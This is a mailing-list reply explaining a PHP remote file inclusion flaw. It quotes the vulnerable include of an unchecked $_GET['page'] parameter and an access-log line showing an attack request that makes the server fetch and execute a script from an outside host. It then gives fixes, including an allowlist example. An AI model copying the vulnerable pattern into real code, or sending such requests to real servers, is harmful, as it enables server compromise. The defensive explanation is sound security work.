Hi,
> at that mentioned time someone at least tried to access pages which are
> not accessible (index.php?img=1 e.g.)
>
> there definitely might be a problem in the code:
>
> if ( $_GET['page'] ) {
> include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?

Looks like that's the one. Have a look at the following line in your log file:

82.103.132.227 - - [29/Oct/2006:20:12:34 +0100] "GET /index.php?page=http://www.excelsiorgroningen.nl/www/.admin/readname.txt? HTTP/1.1" 200 39094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"

Your script then includes and executes the script from the URL.

How to avoid? First, follow RULE ONE (TM): Always do sanity checks on user-supplied input.

The impact could have been avoided by setting allow_url_fopen to 0 in your php.ini. (Unless one of your scripts really, really needs this - but think twice before using it!)

But IMHO your approach to include files with dynamically generated paths is not a good idea anyway. Consider a different solution like redirecting the Browser to the resulting URL. This won't prevent the attack from being successful, but it won't affect your server.

Best regards,
Holger
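The sanity check on user-supplied input recommended above, as an added example that is not part of the original message or the original poster's code: the `page` parameter only selects an entry from a fixed allowlist, and the path handed to `include` is built from that entry. The page names, the `pages/` directory, the default of `home` and the `resolve_page` helper are assumptions made for illustration.

```php
<?php
// Added example, not the original poster's code. The page names in
// ALLOWED_PAGES are hypothetical placeholders for the site's real sections.
const ALLOWED_PAGES = ['home', 'gallery', 'contact'];

/**
 * Map the user-supplied ?page= value to a file under $baseDir, or return
 * null. The request value only selects an allowlist entry; the path that
 * reaches include is built from the allowlist entry, never from the input.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // ?page[]=x arrives as an array; anything that is not a string is rejected.
    if (!is_string($requested)) {
        return null;
    }
    $idx = array_search($requested, ALLOWED_PAGES, true);  // strict comparison
    if ($idx === false) {
        return null;  // URLs, "../" sequences and unknown names all end here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . ALLOWED_PAGES[$idx] . '/index.php');
    // Defence in depth: the resolved file must exist and sit below $baseDir
    // (catches a symlinked page directory pointing elsewhere).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Assumption: page directories live in ./pages and "home" is the default.
$page = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

With this check, the request shown in the log line above gets a 404 because its `page` value is not an allowlist entry, whatever the php.ini settings are.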

